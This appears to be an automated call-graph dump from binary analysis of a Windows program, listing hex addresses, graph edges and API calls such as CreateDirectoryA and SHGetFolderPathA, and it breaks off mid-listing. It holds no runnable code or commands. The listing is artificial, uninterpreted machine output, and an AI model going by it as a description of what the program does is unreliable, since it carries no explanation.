83b3b4 std::_Throw_Cpp_error 44881->44883 44912 84e7e0 44882->44912 44884 83ace0 3 API calls 44883->44884 44886 83b3d9 44884->44886 44916 827cf0 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 44886->44916 44888 83b3ee std::_Throw_Cpp_error 44889 83b33b std::_Throw_Cpp_error 44889->44810 44891 8419f5 std::_Throw_Cpp_error 44890->44891 44892 8419d0 44890->44892 44893 83ace0 3 API calls 44891->44893 44892->44810 44894 841a18 44893->44894 44942 827cf0 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 44894->44942 44896 841a2d std::_Throw_Cpp_error 44898 83ad10 44897->44898 44898->44898 44943 83fbf0 44898->44943 44900 83ad24 44900->44810 44950 858bac GetLastError GetLastError GetLastError __fread_nolock 44901->44950 44903 858c7f __Getcoll 44904->44798 44905->44798 44906->44847 44907->44850 44908->44859 44909->44862 44910->44869 44911->44871 44914 84e82a std::_Throw_Cpp_error 44912->44914 44915 84e9ff 44912->44915 44914->44915 44917 833d50 44914->44917 44915->44889 44916->44888 44918 833d8f 44917->44918 44926 833df7 std::_Throw_Cpp_error 44917->44926 44919 833e69 std::_Throw_Cpp_error 44918->44919 44920 833d96 std::_Throw_Cpp_error 44918->44920 44923 833f7d Concurrency::cancel_current_task std::_Throw_Cpp_error 44918->44923 44918->44926 44919->44926 44937 84bf30 44919->44937 44929 84f460 44920->44929 44925 858c70 std::_Throw_Cpp_error 3 API calls 44923->44925 44923->44926 44924 833d50 3 API calls 44927 833eb1 44924->44927 44928 83409d 44925->44928 44926->44914 44927->44924 44927->44926 44930 84f498 std::_Throw_Cpp_error 44929->44930 44936 84f53f 44929->44936 44931 833d50 3 API calls 44930->44931 44932 84f4e0 44931->44932 44933 84f460 3 API calls 44932->44933 44934 84f531 44933->44934 44935 84f460 3 API calls 44934->44935 44935->44936 44936->44926 44938 84bf42 Concurrency::cancel_current_task std::_Throw_Cpp_error 44937->44938 44939 858c70 std::_Throw_Cpp_error 3 API calls 44938->44939 44940 84bf63 std::_Throw_Cpp_error 44938->44940 44941 84bfba 44939->44941 44940->44927 44942->44896 44945 83fc8d 44943->44945 44946 83fc12 44943->44946 44944 83fd3a 44944->44900 44945->44944 44949 822fe0 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 44945->44949 44946->44900 44948 83fd27 44948->44900 44949->44948 44950->44903 44951 87e140 44979 82b8e0 44951->44979 44953 87e1a1 44954 87e218 CreateDirectoryA 44953->44954 44956 87e8de 44954->44956 44975 87e24c std::_Throw_Cpp_error 44954->44975 44955 87e8a5 45170 8ff030 44955->45170 44957 87f15b 44956->44957 44959 87e962 CreateDirectoryA 44956->44959 44959->44957 44976 87e990 std::_Throw_Cpp_error 44959->44976 44960 87e8c9 44960->44956 44961 906770 4 API calls 44960->44961 44961->44956 44962 87f11f 44962->44957 44963 906770 4 API calls 44962->44963 44963->44957 44964 87e3bf CreateDirectoryA 44964->44975 44965 87eb09 CreateDirectoryA 44965->44976 44966 906ca0 GetLastError GetLastError GetLastError GetLastError 44966->44975 44967 87e4b2 CreateDirectoryA 44967->44975 44968 906ca0 GetLastError GetLastError GetLastError GetLastError 44968->44976 44969 87ebfc CreateDirectoryA 44969->44976 44970 87e59f CreateDirectoryA 44970->44975 44972 87edd0 CreateDirectoryA 44972->44976 44973 87ece9 CreateDirectoryA 44973->44976 44975->44955 44975->44964 44975->44966 44975->44967 44975->44970 44977 87e7f4 CreateDirectoryA 44975->44977 45181 836290 GetLastError GetLastError GetLastError 44975->45181 44976->44962 44976->44965 44976->44968 44976->44969 44976->44972 44976->44973 44978 87f050 CreateDirectoryA 44976->44978 45182 836290 GetLastError GetLastError GetLastError 44976->45182 44977->44975 44978->44976 44982 82b916 44979->44982 44980 82bfd1 44981 82f315 44980->44981 44985 82c0ab CreateDirectoryA 44980->44985 44988 82f43a CreateDirectoryA 44981->44988 45101 831d37 44981->45101 44982->44980 44983 82b9e7 CreateDirectoryA 44982->44983 44983->44980 44984 82ba12 44983->44984 44989 82bab4 CreateDirectoryA 44984->44989 44985->44981 44987 82c0d6 44985->44987 44986 832270 44986->44953 44994 82c178 CreateDirectoryA 44987->44994 44991 82f465 44988->44991 44988->45101 44992 82bae2 44989->44992 44993 82bc28 44989->44993 44990 831e4d CreateDirectoryA 44990->44986 44995 831e78 44990->44995 44996 82f507 CreateDirectoryA 44991->44996 44999 82baf5 SHGetFolderPathA 44992->44999 45000 82bcea CreateDirectoryA 44993->45000 44997 82c495 44994->44997 45010 82c1a0 std::_Throw_Cpp_error 44994->45010 45001 831fa0 CreateDirectoryA 44995->45001 44998 82f853 44996->44998 45020 82f52f std::_Throw_Cpp_error 44996->45020 45003 82c557 CreateDirectoryA 44997->45003 45011 82f915 CreateDirectoryA 44998->45011 45002 82bba1 std::_Throw_Cpp_error 44999->45002 45004 82bd12 45000->45004 45005 82bf9b 45000->45005 45006 831fc8 std::_Throw_Cpp_error 45001->45006 45081 83223a 45001->45081 45014 83ace0 3 API calls 45002->45014 45007 82d196 45003->45007 45008 82c57f std::_Throw_Cpp_error 45003->45008 45013 82bd25 SHGetFolderPathA 45004->45013 45005->44980 45015 906770 4 API calls 45005->45015 45029 83ace0 3 API calls 45006->45029 45017 82d27c CreateDirectoryA 45007->45017 45027 83ace0 3 API calls 45008->45027 45009 906770 4 API calls 45009->44986 45016 83ace0 3 API calls 45010->45016 45012 82fb75 45011->45012 45018 82f93d std::_Throw_Cpp_error 45011->45018 45021 82fc37 CreateDirectoryA 45012->45021 45019 82be57 std::_Throw_Cpp_error 45013->45019 45022 82bbb7 45014->45022 45015->44980 45070 82c367 std::_Throw_Cpp_error 45016->45070 45044 82d2a4 std::_Throw_Cpp_error 45017->45044 45091 82d618 45017->45091 45028 83ace0 3 API calls 45018->45028 45023 83ace0 3 API calls 45019->45023 45024 83ace0 3 API calls 45020->45024 45035 82fc5f std::_Throw_Cpp_error 45021->45035 45080 82fe11 45021->45080 45025 906ca0 4 API calls 45022->45025 45078 82be6d std::_Throw_Cpp_error 45023->45078 45031 82f7b1 45024->45031 45042 82bbe2 45025->45042 45026 82d6da CreateDirectoryA 45043 82d702 std::_Throw_Cpp_error 45026->45043 45096 82d9f7 45026->45096 45074 82c7d0 std::_Throw_Cpp_error 45027->45074 45032 82fb04 45028->45032 45033 8321c9 45029->45033 45030 82fed3 CreateDirectoryA 45049 82fefb std::_Throw_Cpp_error 45030->45049 45092 830e44 45030->45092 45034 82f7d6 45031->45034 45221 822fe0 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 45031->45221 45046 906ca0 4 API calls 45032->45046 45047 906ca0 4 API calls 45033->45047 45039 906ca0 4 API calls 45034->45039 45041 83ace0 3 API calls 45035->45041 45036 906770 4 API calls 45036->44993 45038 82dab9 CreateDirectoryA 45054 82dae1 std::_Throw_Cpp_error 45038->45054 45105 82de5c 45038->45105 45055 82f80d 45039->45055 45040 830ef4 CreateDirectoryA 45058 830f1c std::_Throw_Cpp_error 45040->45058 45121 831833 45040->45121 45045 82fda0 45041->45045 45042->44993 45042->45036 45051 83ace0 3 API calls 45043->45051 45048 83ace0 3 API calls 45044->45048 45059 906ca0 4 API calls 45045->45059 45064 82fb2f 45046->45064 45065 8321f4 45047->45065 45098 82d464 std::_Throw_Cpp_error 45048->45098 45057 83ace0 3 API calls 45049->45057 45050 82df1e CreateDirectoryA 45071 82df46 std::_Throw_Cpp_error 45050->45071 45126 82e629 45050->45126 45103 82d8c9 std::_Throw_Cpp_error 45051->45103 45052 906770 4 API calls 45052->44997 45053 906770 4 API calls 45053->44998 45066 83ace0 3 API calls 45054->45066 45055->44998 45055->45053 45056 8318e6 CreateDirectoryA 45086 83190e std::_Throw_Cpp_error 45056->45086 45119 831d01 45056->45119 45063 830040 45057->45063 45068 83ace0 3 API calls 45058->45068 45079 82fdcb 45059->45079 45060 906770 4 API calls 45060->45005 45061 906770 4 API calls 45061->45012 45062 906770 4 API calls 45062->45081 45075 906ca0 4 API calls 45063->45075 45064->45012 45064->45061 45065->45062 45065->45081 45118 82dd2e std::_Throw_Cpp_error 45066->45118 45067 82e6dc CreateDirectoryA 45072 82e704 std::_Throw_Cpp_error 45067->45072 45108 82f2eb 45067->45108 45167 831062 std::_Throw_Cpp_error 45068->45167 45069 906770 4 API calls 45069->45101 45070->44997 45070->45052 45077 83ace0 3 API calls 45071->45077 45083 906ca0 4 API calls 45072->45083 45073 906770 4 API calls 45073->45080 45084 83ace0 3 API calls 45074->45084 45088 83006b 45075->45088 45076 906770 4 API calls 45076->44981 45161 82e08c 45077->45161 45078->45005 45078->45060 45079->45073 45079->45080 45080->45030 45081->44986 45081->45009 45082 830b1e std::_Throw_Cpp_error 45087 906770 4 API calls 45082->45087 45082->45092 45097 82e843 std::_Throw_Cpp_error 45083->45097 45123 82cbd9 std::_Throw_Cpp_error 45084->45123 45085 906770 4 API calls 45085->45091 45089 83ace0 3 API calls 45086->45089 45087->45092 45088->45082 45093 906ca0 4 API calls 45088->45093 45095 831a89 45089->45095 45090 906770 4 API calls 45090->45096 45091->45026 45092->45040 45109 830131 45093->45109 45094 906ca0 4 API calls 45165 82e9a1 45094->45165 45106 906ca0 4 API calls 45095->45106 45096->45038 45097->45094 45098->45085 45098->45091 45099 906770 4 API calls 45099->45105 45100 83180f 45107 906770 4 API calls 45100->45107 45110 831821 45100->45110 45101->44986 45101->44990 45102 82f2d9 45104 906770 4 API calls 45102->45104 45102->45108 45103->45090 45103->45096 45104->45108 45105->45050 45146 831ab4 45106->45146 45107->45110 45108->44981 45108->45076 45112 8301ea CreateDirectoryA 45109->45112 45113 8301e8 45109->45113 45122 8301f7 45109->45122 45117 8385d0 3 API calls 45110->45117 45111 82e605 45114 906770 4 API calls 45111->45114 45116 82e617 45111->45116 45112->45122 45113->45112 45114->45116 45115 906770 4 API calls 45115->45119 45208 8385d0 45116->45208 45117->45121 45118->45099 45118->45105 45119->45069 45119->45101 45120 82ed6a 45128 906ca0 4 API calls 45120->45128 45121->45056 45125 906ca0 4 API calls 45122->45125 45127 83ace0 3 API calls 45123->45127 45129 83043e 45125->45129 45126->45067 45155 82cfe2 std::_Throw_Cpp_error 45127->45155 45135 82ee2e 45128->45135 45132 83057b 45129->45132 45133 83057d CreateDirectoryA 45129->45133 45139 83058a 45129->45139 45132->45133 45133->45139 45134 8322ac 45134->44953 45140 82eee7 CreateDirectoryA 45135->45140 45141 82eee5 45135->45141 45147 82eef4 45135->45147 45144 906ca0 4 API calls 45139->45144 45140->45147 45141->45140 45142 8388d0 GetLastError GetLastError GetLastError 45142->45161 45150 8307d1 45144->45150 45146->45115 45146->45119 45183 8af070 45147->45183 45148 8385d0 3 API calls 45151 82f2bb 45148->45151 45149 906770 4 API calls 45149->45007 45152 83088a CreateDirectoryA 45150->45152 45153 830888 45150->45153 45154 830897 45150->45154 45156 8385d0 3 API calls 45151->45156 45152->45154 45153->45152 45157 906ca0 4 API calls 45154->45157 45155->45007 45155->45149 45156->45102 45160 830a58 45157->45160 45158 82f002 45158->45148 45159 8388d0 GetLastError GetLastError GetLastError 45159->45165 45160->45082 45162 830b11 CreateDirectoryA 45160->45162 45163 830b0f 45160->45163 45161->45111 45161->45142 45205 83a4f0 GetLastError GetLastError GetLastError 45161->45205 45206 825980 GetLastError GetLastError GetLastError GetLastError GetLastError 45161->45206 45207 822fe0 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 45161->45207 45162->45082 45163->45162 45165->45102 45165->45120 45165->45159 45219 83a4f0 GetLastError GetLastError GetLastError 45165->45219 45220 825980 GetLastError GetLastError GetLastError GetLastError GetLastError 45165->45220 45166 8322a7 45168 858c70 std::_Throw_Cpp_error 3 API calls 45166->45168 45167->45100 45167->45134 45167->45166 45169 8388d0 GetLastError GetLastError GetLastError 45167->45169 45222 83a4f0 GetLastError GetLastError GetLastError 45167->45222 45223 825980 GetLastError GetLastError GetLastError GetLastError GetLastError 45167->45223 45168->45134 45169->45167 45171 8559b0 45170->45171 45172 8ff088 SHGetFolderPathA 45171->45172 45173 8ff150 std::_Throw_Cpp_error 45172->45173 45174 83fbf0 3 API calls 45173->45174 45175 8ff19d 45174->45175 45176 906ca0 4 API calls 45175->45176 45177 8ff245 45176->45177 45178 8ffe9b std::_Throw_Cpp_error 45177->45178 45179 858c70 std::_Throw_Cpp_error 3 API calls 45177->45179 45178->44960 45180 8ffef2 45179->45180 45181->44975 45182->44976 45189 8af177 std::_Throw_Cpp_error 45183->45189 45184 8af22d std::_Throw_Cpp_error 45199 8af343 45184->45199 45203 8af390 std::_Throw_Cpp_error 45184->45203 45224 8af590 45184->45224 45185 858c70 std::_Throw_Cpp_error 3 API calls 45187 8af3cb 45185->45187 45190 8af590 5 API calls 45187->45190 45188 8af321 45192 8385d0 3 API calls 45188->45192 45189->45184 45191 8af21b CloseHandle 45189->45191 45200 8af44f 45190->45200 45191->45184 45196 8af330 45192->45196 45193 8af4ac 45198 8385d0 3 API calls 45193->45198 45194 8af2c9 45194->45188 45242 836130 GetLastError GetLastError GetLastError 45194->45242 45196->45199 45243 844400 4 API calls 2 library calls 45196->45243 45201 8af4b8 45198->45201 45199->45185 45199->45203 45200->45193 45244 836130 GetLastError GetLastError GetLastError 45200->45244 45201->45158 45203->45158 45205->45161 45206->45161 45207->45161 45209 8385f3 45208->45209 45210 83863c std::_Throw_Cpp_error 45208->45210 45209->45210 45211 858c70 std::_Throw_Cpp_error 3 API calls 45209->45211 45210->45126 45212 838672 45211->45212 45407 824900 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 45212->45407 45214 838728 std::_Throw_Cpp_error 45408 852729 GetLastError 6 library calls 45214->45408 45216 83873b std::_Throw_Cpp_error 45217 8387cc 45216->45217 45409 824900 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 45216->45409 45217->45126 45219->45165 45220->45165 45221->45034 45222->45167 45223->45167 45240 8af5fe std::_Throw_Cpp_error 45224->45240 45225 8af685 std::_Throw_Cpp_error 45225->45194 45226 858c70 std::_Throw_Cpp_error 3 API calls 45228 8afef0 std::_Throw_Cpp_error 45226->45228 45227 8af649 45227->45225 45227->45226 45230 83ace0 3 API calls 45228->45230 45231 8aff19 45230->45231 45285 827cf0 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 45231->45285 45233 8aff31 std::_Throw_Cpp_error 45240->45227 45240->45228 45240->45233 45245 836130 GetLastError GetLastError GetLastError 45240->45245 45246 878b00 45240->45246 45251 83b430 45240->45251 45260 837ef0 45240->45260 45265 846db0 45240->45265 45269 83af80 45240->45269 45283 83b0e0 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 45240->45283 45284 844400 4 API calls 2 library calls 45240->45284 45242->45194 45243->45199 45244->45200 45245->45240 45286 878bb0 45246->45286 45248 878b31 std::_Throw_Cpp_error 45290 822d70 45248->45290 45250 878b8f 45250->45240 45252 837ef0 3 API calls 45251->45252 45253 83b48d 45252->45253 45307 842100 45253->45307 45257 83b503 45356 83d490 45257->45356 45261 838034 std::_Throw_Cpp_error 45260->45261 45262 837f1d std::_Throw_Cpp_error 45260->45262 45261->45262 45405 827f90 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 45261->45405 45262->45240 45264 838062 std::_Throw_Cpp_error 45266 846df1 std::_Throw_Cpp_error 45265->45266 45267 837ef0 3 API calls 45266->45267 45268 846e23 45266->45268 45267->45268 45268->45240 45270 83afc5 45269->45270 45271 83afb8 45269->45271 45273 83b08c std::_Throw_Cpp_error 45270->45273 45274 83afda std::_Throw_Cpp_error 45270->45274 45272 837ef0 3 API calls 45271->45272 45272->45270 45275 83ace0 3 API calls 45273->45275 45276 846db0 3 API calls 45274->45276 45277 83b0b1 45275->45277 45280 83b029 std::_Throw_Cpp_error 45276->45280 45406 827cf0 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 45277->45406 45279 83b058 std::_Throw_Cpp_error 45279->45240 45280->45279 45281 858c70 std::_Throw_Cpp_error 3 API calls 45280->45281 45282 83b0dc 45281->45282 45283->45240 45284->45240 45285->45233 45288 878d38 45286->45288 45289 878c08 45286->45289 45288->45248 45289->45288 45294 8587b0 45289->45294 45291 822d91 45290->45291 45293 822db0 std::_Throw_Cpp_error 45290->45293 45292 858c70 std::_Throw_Cpp_error 3 API calls 45291->45292 45291->45293 45292->45291 45293->45250 45295 8587c7 45294->45295 45296 8587e3 45294->45296 45295->45289 45301 86a12d 45296->45301 45300 85882a 45300->45289 45302 8587f8 45301->45302 45303 86a140 45301->45303 45302->45295 45305 869a39 GetLastError GetLastError GetLastError __fread_nolock 45302->45305 45303->45302 45306 872392 GetLastError __fread_nolock std::_Lockit::_Lockit __Getcoll 45303->45306 45305->45300 45306->45302 45308 84215f 45307->45308 45360 86133b 45308->45360 45312 83b4f0 45313 83db10 45312->45313 45314 83db56 45313->45314 45315 83de3d 45313->45315 45394 83ebb0 GetLastError GetLastError GetLastError 45314->45394 45317 83fd70 3 API calls 45315->45317 45319 83de87 45317->45319 45318 83dba4 45320 83fd70 3 API calls 45318->45320 45353 83df1f std::_Throw_Cpp_error 45319->45353 45402 83eda0 GetLastError GetLastError GetLastError GetLastError std::_Throw_Cpp_error 45319->45402 45322 83dbc1 45320->45322 45355 83dcc3 std::_Throw_Cpp_error 45322->45355 45395 83eda0 GetLastError GetLastError GetLastError GetLastError std::_Throw_Cpp_error 45322->45395 45323 837ef0 3 API calls 45331 83dfc7 45323->45331 45324 83de38 std::_Throw_Cpp_error 45324->45257 45325 83dee2 45403 8275c0 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 45325->45403 45327 83df06 45404 83f440 GetLastError GetLastError GetLastError GetLastError std::_Throw_Cpp_error 45327->45404 45329 83dd82 45337 837ef0 3 API calls 45329->45337 45340 83dd9f 45329->45340 45330 83dcec 45335 837ef0 3 API calls 45330->45335 45331->45324 45332 858c70 std::_Throw_Cpp_error 3 API calls 45331->45332 45342 83e06f std::_Throw_Cpp_error 45332->45342 45334 83dc1c 45396 8275c0 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 45334->45396 45349 83dd01 45335->45349 45337->45340 45338 83dc40 45397 83f440 GetLastError GetLastError GetLastError GetLastError std::_Throw_Cpp_error 45338->45397 45399 8335b0 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 45340->45399 45345 858c70 std::_Throw_Cpp_error 3 API calls 45342->45345 45343 83dd6c 45400 8335b0 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 45343->45400 45344 83e093 std::_Throw_Cpp_error 45348 858c70 std::_Throw_Cpp_error 3 API calls 45344->45348 45345->45344 45351 83e0b7 45348->45351 45398 8335b0 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 45349->45398 45350 83de26 45401 8335b0 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 45350->45401 45353->45323 45353->45331 45353->45344 45354 83dc56 45354->45342 45354->45355 45355->45329 45355->45330 45357 83d4cb 45356->45357 45358 822d70 3 API calls 45357->45358 45359 83b512 45358->45359 45359->45240 45361 861346 45360->45361 45362 86a12d __Getcoll GetLastError 45361->45362 45363 84225f 45362->45363 45364 83fd70 45363->45364 45367 83fd84 45364->45367 45376 83fde4 45364->45376 45366 83ff6c 45366->45312 45370 83fdc2 45367->45370 45378 849e20 45367->45378 45371 849e20 3 API calls 45370->45371 45374 83fe58 45370->45374 45370->45376 45371->45374 45372 83fecc 45372->45366 45377 849e20 3 API calls 45372->45377 45388 8408f0 GetLastError GetLastError GetLastError 45372->45388 45373 83fe74 45373->45312 45374->45373 45386 841430 GetLastError GetLastError GetLastError 45374->45386 45376->45373 45387 8401e0 GetLastError GetLastError GetLastError 45376->45387 45377->45372 45379 849f76 Concurrency::cancel_current_task 45378->45379 45380 849e62 std::_Throw_Cpp_error 45378->45380 45381 858c70 std::_Throw_Cpp_error 3 API calls 45379->45381 45380->45379 45383 849e9a std::_Throw_Cpp_error 45380->45383 45382 849f85 45381->45382 45389 8477d0 45383->45389 45385 849f47 45385->45370 45386->45376 45387->45372 45388->45372 45390 8477f9 std::_Throw_Cpp_error 45389->45390 45391 8477dc 45389->45391 45390->45385 45391->45390 45392 858c70 std::_Throw_Cpp_error 3 API calls 45391->45392 45393 847824 45392->45393 45394->45318 45395->45334 45396->45338 45397->45354 45398->45343 45399->45343 45400->45350 45401->45324 45402->45325 45403->45327 45404->45353 45405->45264 45406->45280 45407->45214 45408->45216 45409->45217 45410 886d20 45411 886d6a 45410->45411 45412 906ca0 4 API calls 45411->45412 45423 888700 45411->45423 45431 889734 45411->45431 45413 886e27 45412->45413 45416 906c10 4 API calls 45413->45416 45417 886e4a 45413->45417 45415 889e62 45416->45417 45418 83b260 3 API calls 45417->45418 45419 887afc 45417->45419 45417->45423 45440 886e79 std::_Throw_Cpp_error 45418->45440 45420 8886d6 45419->45420 45421 83b260 3 API calls 45419->45421 45422 906770 4 API calls 45420->45422 45420->45423 45443 887b2e std::_Throw_Cpp_error 45421->45443 45422->45423 45425 83b260 3 API calls 45423->45425 45426 888ff4 45423->45426 45423->45431 45447 8888e3 std::_Throw_Cpp_error 45425->45447 45429 83b260 3 API calls 45426->45429 45426->45431 45427 8330f0 3 API calls 45427->45443 45448 889026 std::_Throw_Cpp_error 45429->45448 45430 833200 3 API calls 45430->45443 45468 832c30 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 45431->45468 45432 8330f0 3 API calls 45432->45447 45433 833200 3 API calls 45433->45447 45434 8330f0 3 API calls 45434->45448 45435 833200 3 API calls 45435->45448 45436 83b400 GetLastError GetLastError GetLastError 45436->45443 45437 83af80 GetLastError GetLastError GetLastError 45437->45448 45438 83af80 GetLastError GetLastError GetLastError 45438->45440 45439 83b400 GetLastError GetLastError GetLastError 45439->45447 45440->45419 45440->45438 45441 83b400 GetLastError GetLastError GetLastError 45440->45441 45452 83ac50 GetLastError GetLastError GetLastError 45440->45452 45453 906ca0 GetLastError GetLastError GetLastError GetLastError 45440->45453 45454 906c10 GetLastError GetLastError GetLastError CreateDirectoryA 45440->45454 45455 8330f0 45440->45455 45460 833200 45440->45460 45467 906470 GetLastError GetLastError GetLastError 45440->45467 45441->45440 45442 83af80 GetLastError GetLastError GetLastError 45442->45443 45443->45420 45443->45427 45443->45430 45443->45436 45443->45442 45446 83ac50 GetLastError GetLastError GetLastError 45443->45446 45450 906ca0 GetLastError GetLastError GetLastError GetLastError 45443->45450 45451 906c10 GetLastError GetLastError GetLastError CreateDirectoryA 45443->45451 45444 83af80 GetLastError GetLastError GetLastError 45444->45447 45445 83b400 GetLastError GetLastError GetLastError 45445->45448 45446->45443 45447->45426 45447->45432 45447->45433 45447->45439 45447->45444 45448->45431 45448->45434 45448->45435 45448->45437 45448->45445 45450->45443 45451->45443 45452->45440 45453->45440 45454->45440 45456 833114 45455->45456 45457 83316c std::_Throw_Cpp_error 45455->45457 45456->45440 45469 827b10 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 45457->45469 45459 833191 std::_Throw_Cpp_error 45461 83325c std::_Throw_Cpp_error 45460->45461 45462 833225 std::_Throw_Cpp_error 45460->45462 45470 827b10 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 45461->45470 45463 833235 45462->45463 45471 827b10 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 45462->45471 45463->45440 45466 8332b7 std::_Throw_Cpp_error 45467->45440 45468->45415 45469->45459 45470->45462 45471->45466 45472 88a140 45477 88a17b 45472->45477 45473 88aa60 45475 8338b0 GetLastError GetLastError GetLastError 45475->45477 45476 83af80 GetLastError GetLastError GetLastError 45476->45477 45477->45473 45477->45475 45477->45476 45478 833d50 GetLastError GetLastError GetLastError 45477->45478 45479 8bf0d0 45477->45479 45478->45477 45480 8bf106 45479->45480 45481 837ef0 3 API calls 45480->45481 45482 8bf12f 45481->45482 45532 8340c0 45482->45532 45485 83af80 3 API calls 45486 8bf1f4 45485->45486 45487 8bf212 SHGetFolderPathA 45486->45487 45538 83ac50 45487->45538 45490 8c34a3 45490->45477 45491 8c34fb std::_Throw_Cpp_error 45492 83ace0 3 API calls 45491->45492 45493 8c3529 45492->45493 45627 827cf0 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 45493->45627 45495 8c3541 std::_Throw_Cpp_error 45496 858c70 std::_Throw_Cpp_error 3 API calls 45495->45496 45499 8c355a std::_Throw_Cpp_error 45496->45499 45501 83ace0 3 API calls 45499->45501 45500 83b430 4 API calls 45530 8bf23f std::_Throw_Cpp_error 45500->45530 45503 8c3582 45501->45503 45628 827cf0 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 45503->45628 45506 96b610 GetLastError 45506->45530 45507 96ae20 GetLastError 45507->45530 45509 8c359a std::_Throw_Cpp_error 45510 83ace0 3 API calls 45509->45510 45512 8c35d7 45510->45512 45511 83af80 GetLastError GetLastError GetLastError 45511->45530 45629 827cf0 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 45512->45629 45514 8c35ef std::_Throw_Cpp_error 45515 8330f0 GetLastError GetLastError GetLastError 45515->45530 45516 833200 3 API calls 45516->45530 45517 906ca0 GetLastError GetLastError GetLastError GetLastError 45517->45530 45518 833d50 GetLastError GetLastError GetLastError 45518->45530 45519 8c1c5f CreateDirectoryA 45519->45530 45520 846db0 GetLastError GetLastError GetLastError 45520->45530 45521 83ace0 GetLastError GetLastError GetLastError 45521->45530 45522 8c1f46 CreateDirectoryA 45522->45530 45523 83b0e0 GetLastError GetLastError GetLastError 45523->45530 45524 822fe0 GetLastError GetLastError GetLastError 45524->45530 45526 8c3610 10 API calls 45526->45530 45527 837ef0 GetLastError GetLastError GetLastError 45527->45530 45528 861628 10 API calls 45528->45530 45529 833980 GetLastError GetLastError GetLastError 45529->45530 45530->45490 45530->45491 45530->45495 45530->45499 45530->45500 45530->45506 45530->45507 45530->45509 45530->45511 45530->45515 45530->45516 45530->45517 45530->45518 45530->45519 45530->45520 45530->45521 45530->45522 45530->45523 45530->45524 45530->45526 45530->45527 45530->45528 45530->45529 45543 860fae 45530->45543 45553 8f6790 45530->45553 45575 930f30 45530->45575 45602 8f65f0 45530->45602 45618 907640 45530->45618 45624 844900 GetLastError GetLastError GetLastError 45530->45624 45625 96af50 GetLastError 45530->45625 45626 8336c0 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 45530->45626 45534 8340ff std::_Throw_Cpp_error 45532->45534 45533 8341ac 45533->45485 45534->45533 45535 84bf30 3 API calls 45534->45535 45536 834171 45535->45536 45536->45533 45630 839860 GetLastError GetLastError GetLastError 45536->45630 45539 83ac81 45538->45539 45540 83ac9b 45539->45540 45541 83fbf0 3 API calls 45539->45541 45540->45530 45542 83ad24 45541->45542 45542->45530 45544 861005 45543->45544 45545 860fbd 45543->45545 45633 86101b GetLastError GetLastError GetLastError __fread_nolock __dosmaperr 45544->45633 45547 860fc3 __dosmaperr 45545->45547 45550 860fe0 __dosmaperr 45545->45550 45631 858c60 GetLastError GetLastError GetLastError __fread_nolock 45547->45631 45548 860fd3 45548->45530 45552 860ffe 45550->45552 45632 858c60 GetLastError GetLastError GetLastError __fread_nolock 45550->45632 45552->45530 45554 8f6870 std::_Throw_Cpp_error 45553->45554 45634 9064d0 45554->45634 45557 8f6a59 45558 8385d0 3 API calls 45557->45558 45559 8f6a6d 45558->45559 45559->45530 45560 8f68d5 45564 8f6a40 45560->45564 45646 8f6ba0 GetLastError 45560->45646 45562 8f6a3c 45563 8f6a82 45562->45563 45562->45564 45565 8f6b82 45563->45565 45566 8f6aa1 45563->45566 45658 91ad00 45564->45658 45704 852534 GetLastError GetLastError GetLastError __EH_prolog3 std::_Throw_Cpp_error 45565->45704 45568 8f6b89 45566->45568 45569 8f6ab1 45566->45569 45705 852534 GetLastError GetLastError GetLastError __EH_prolog3 std::_Throw_Cpp_error 45568->45705 45570 91ad00 GetLastError 45569->45570 45573 8f6acd 45570->45573 45572 8f6b9a 45573->45557 45703 843a30 GetLastError GetLastError GetLastError Concurrency::cancel_current_task std::_Throw_Cpp_error 45573->45703 45576 931410 45575->45576 45578 930f57 45575->45578 45576->45530 45578->45576 45894 931420 45578->45894 45579 9313f1 45579->45530 45580 931420 GetLastError 45580->45579 45583 930fe7 45933 955d70 GetLastError 45583->45933 45585 93101a 45934 955d70 GetLastError 45585->45934 45587 931078 45589 969d90 GetLastError 45587->45589 45590 93109e 45587->45590 45588 931028 45588->45587 45935 9563f0 GetLastError 45588->45935 45589->45590 45592 969d90 GetLastError 45590->45592 45593 93113f 45590->45593 45592->45593 45594 969d90 GetLastError 45593->45594 45595 9311ca 45593->45595 45594->45595 45596 969d90 GetLastError 45595->45596 45597 93124b 45595->45597 45596->45597 45598 969d90 GetLastError 45597->45598 45600 9312dc 45597->45600 45598->45600 45599 9313ba 45599->45580 45600->45599 45601 9675d0 GetLastError 45600->45601 45601->45599 45603 8f6634 45602->45603 45604 8f663f 45603->45604 45605 8f6768 45603->45605 45606 8f676f 45604->45606 45607 8f664f 45604->45607 46112 852534 GetLastError GetLastError GetLastError __EH_prolog3 std::_Throw_Cpp_error 45605->46112 46113 852534 GetLastError GetLastError GetLastError __EH_prolog3 std::_Throw_Cpp_error 45606->46113 45610 8f668e 45607->45610 45613 8f66c2 45607->45613 45612 96b110 GetLastError 45610->45612 45611 8f6780 45614 8f6695 45612->45614 45615 96b110 GetLastError 45613->45615 45614->45530 45616 8f66c9 45615->45616 46099 85d25e 45616->46099 45620 907740 45618->45620 45619 9077b1 45619->45530 45620->45619 46146 8593ab 45620->46146 45622 90775f 46150 86209f 45622->46150 45625->45530 45626->45530 45627->45495 45628->45509 45629->45514 45630->45536 45631->45548 45632->45548 45633->45548 45639 906562 std::_Throw_Cpp_error 45634->45639 45635 90668f 45637 906713 45635->45637 45640 906698 45635->45640 45636 906767 45643 